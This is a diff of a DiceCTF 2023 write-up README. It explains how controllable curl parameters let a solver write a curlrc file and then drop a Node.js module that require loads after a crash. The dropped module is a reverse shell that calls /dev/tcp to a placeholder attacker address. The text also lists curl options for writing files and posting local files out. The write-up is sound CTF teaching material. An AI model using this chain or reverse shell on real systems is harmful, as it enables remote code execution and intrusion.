r3kapig/writeup/20230206-DiceCTF2023-EN/README.md

     });
 ```

 The code extracts 3 params from req.body: `url`, `opt` and `data`.
 Where `url` is verified by new `URL(url)` and the protocol must be either http or https; `opt` has a RegEx check and must be - followed by a letter; when `opt` is `-d` or `data` is one of GET/POST, they will be passed as parameters to curl.
-The parameters are passed to child_process.spawn, and `shell=True` is not specified in the third parameter, so `cmd` or `$(cmd)` cannot be injected into the parameter to execute the command.
+The parameters are passed to child_process.spawn, and `shell=True` is not specified in the third parameter, so `cmd` or `$(cmd)` cannot be injected into the parameter to achieve RCE.

-That is to say, the commands we can execute look like this:
+So the commands we can execute look like this:

 ```
 curl http(s)://<any URL> -d <any content>
 curl http(s)://<any URL> -<a letter> <GET or POST>
 ```

-It is a very common CTF problem that curl parameters are controllable.
-Common uses include:
+`curl` with controllable parameters are quite prevalent in recent CTFs.
+There are a few ways to exploit it:

-`-O <path>` write to file
+`-O <path>` write response to file

-`-K <path>` specifies curlrc, which can contain any curl parameters
+`-K <path>` load curlrc which can contain any curl parameters

-`-d @/path/to/file` POST the file to the specified URL
+`-d @/path/to/file` POST local file to remote URL

-The -O and -K are used here, first `-O GET` to save the following content to `/tmp/GET`,
+The -O and -K are used to solve this challenge.
+Firstly, use `-O GET` to save the following content to `/tmp/GET`:

 ```
 create-dirs
 output="/home/user/.node_modules/kerberos.js"
 ```

-Then `-K GET` loads it as curlrc, which is equivalent to specifying any and multiple curl parameters, that is, specifying `--create-dirs --output=/home/user/.node_modules/kerberos.js`, put the following content Save to kerberos.js:
+Then use `-K GET` to load it as curlrc, which allows us to specify multiple curl parameters.
+In this case, we will pass `--create-dirs --output=/home/user/.node_modules/kerberos`.js to curl, and save the following content kerberos.js:

 ```
 require('child_process').exec('bash -c "bash -i >& /dev/tcp/<YOUR_IP>/<YOUR_PORT> 0>&1"')
 ```

-Trigger a node process crash, and require will load this `/home/user/.node_modules/kerberos.js` when restarting
+Then we trigger a node process crash, and after a restart, `require` will load `/home/user/.node_modules/kerberos.js `

-How did this `/home/user/.node_modules/kerberos.js` come from?
-Use strace to see what will be loaded when required in nodejs
+Where did this `/home/user/.node_modules/kerberos.js` come from?
+Let's use `strace` to see what will be loaded when `require` is called in nodejs:

 ![](https://imgur.com/9TCOYO9.png)

-There are three lines of requirement in the app.js given in the title:
+There are three lines of `require` in the app.js:

 ```javascript
 const { MongoClient } = require("mongodb");